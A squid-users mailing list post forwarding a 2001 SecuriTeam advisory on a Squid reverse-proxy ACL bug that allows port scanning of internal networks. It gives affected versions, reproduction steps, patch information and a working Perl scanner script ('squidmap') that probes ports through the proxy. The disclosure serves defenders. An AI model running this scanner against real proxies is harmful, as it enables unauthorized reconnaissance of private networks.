[squid-users] Squid security alert

I got this e-mail message and thought you guys would be interested:

Subject:
       [UNIX] Squid HTTPd Acceleration ACL Bug Enables Port Scanning
   Date:
       Tue, 24 Jul 2001 11:33:32 -0700 (PDT)
  From:
       support@securiteam.com
    To:
       list@securiteam.com

The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com

  Squid HTTPd Acceleration ACL Bug Enables Port Scanning
------------------------------------------------------------------------

SUMMARY

 <http://www.squid-cache.org> Squid is a high-performance proxy-caching
server for web clients, supporting FTP, gopher, and HTTP data objects.
Squid can be misused by remote attackers as a proxy and enables remote
port scanning of the local network if it has been setup as an HTTPd
accelerator (reverse proxy).

DETAILS

Vulnerable systems:
Squid version 2.3STABLE3
Squid version 2.3STABLE4 unpatched
RedHat 7.0

Immune systems:
RedHat version 6.2
RedHat version 7.1
Debian version 2.2
Debian version 2.4

Squid has a known bug in 2.3STABLE4 which ignores ACL's in httpd_accel
mode. Note this is only if in httpd_accel_host is set and
httpd_accel_with_proxy off is set. This is not the default configuration
so it is not vulnerable without making these configuration changes.

This enables port scanning via squid running in this mode potentially
allowing remote attackers to compromise machines through a squid set up
this way.

Steps to reproduce:
1. Set squid to httpd_accel mode, with a particular host and strict ACL's.

2. Export httpd_proxy="http://squid-server:port"

3. Run lynx http://victim:port/

You will get a HTTP 200 code if the port is open and sometimes a response
if a service (SSH, SMTP) is active.
The correct behavior should be access denied (403).

General information:
Proxies have often been used in anonymizing attacks on HTTP, but as more
sites use reverse proxy as a method of distributing their network load and

load balancing requests there is the possibility that malicious users
could gain access via these proxies.

Solution:
Squid are aware of this bug and have a patch on their site.

RedHat, Immunix and others have been notified and updates are imminent
later today.

Consider using additional security measures such as a squid redirector,
packet filtering, etc.

Exploit:
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
$|++;
require LWP::UserAgent;
use Getopt::Std;

getopts('b:P:t:L:H:',\%args);

if ($args{t} eq "") { # Specify a port for tomcat
    print_help();
    exit 0;
     }

$low = $args{L} || 1;
$high = $args{H} || 8192;
$proxy = $args{b};
$proxy_port = $args{P} || 80;
$target = $args{t};

$ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap $version scanning $target via
http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";
# for loop hard coded - fixme
for ($port=$low;$port<=$high;$port++) {
$request = HTTP::Request->new('CONNECT', "http://$target:$port");
    my $res = $ua->request($request);
    my $service = getservbyport($port, tcp);

         # Check the outcome of the response
         if ($res->is_success) {
             print "$port\topen\t\t", $service, "\t\t", $res->content,
"\n";
         }
}

sub print_help {
print 'Usage: squidmap <options> where options:',"\n";
print '-b host HTTP proxy via host',"\n";
print '-P ## HTTP proxy port (default: 80)',"\n";
print '-L ## low end/start of range (default: 1)',"\n";
print '-H ## high end/end of range (default: 8192)',"\n";
print '-t host target to attempt to scan',"\n";
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:pnasrat@uk.now.com> Paul
Nasrat.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.

My DVD Collection
Received on Tue Jul 24 2001 - 14:25:07 MDT